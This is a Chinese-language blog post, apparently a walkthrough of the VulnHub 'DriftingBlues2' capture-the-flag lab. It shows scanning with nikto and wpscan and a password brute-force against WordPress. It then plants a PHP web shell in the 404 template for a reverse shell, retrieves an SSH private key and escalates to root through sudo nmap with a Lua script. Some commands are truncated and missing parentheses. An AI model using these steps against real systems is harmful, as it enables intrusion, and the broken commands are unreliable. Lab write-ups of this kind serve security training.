vulnhub靶场渗透实战12-driftingblues2

科技资讯 投稿 23200 0 评论

vulnhub靶场渗透实战12-driftingblues2

vbox导入,网络桥接。

https://download.vulnhub.com/driftingblues/driftingblues2.ova

 一:信息收集

1;主机发现。

 5;没发现其他,我们目录遍历一下。


nikto -h http://192.168.1.23  新扫描目标站点下有无目录的工具


 6;一个登录框。添加本地host,因为/blog源码里面有个域名。

driftingblues.box


6;一个登录框。添加本地host,因为/blog源码里面有个域名。by albert?可能是用户名。

driftingblues.box,在hosts添加。



wpscan --url http://192.168.1.23/blog/ -e u


 7;爆破一下这个用户的密码。albert/scotland1

wpscan --url http://192.168.1.23/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

 8;登录成功。

 二;漏洞利用

1;往404页面写个PHPshell进去,保存,凯莉开启监听,访问一个不存在的路径。

 2;监听成功。升级一下shell。


也可以开服务,卡莉下载私钥文件。

python2 -m SimpleHTTPServer 9998

wget http://192.168.1.23:9998/id_rsa


 4;利用私钥文件,登录freddie用户,

 5;看到有root权限,nmap提权。提权成功,两个flag。

https://gtfobins.github.io/查找nmap

TF=$(mktemp
echo 'os.execute("/bin/sh"' > $TF
sudo nmap --script=$TF



使用 python 切换 bash:python3 -c 'import pty; pty.spawn("/bin/bash"'

编程笔记 » vulnhub靶场渗透实战12-driftingblues2

赞同 (30) or 分享 (0)
游客 发表我的评论   换个身份
取消评论

表情
(0)个小伙伴在吐槽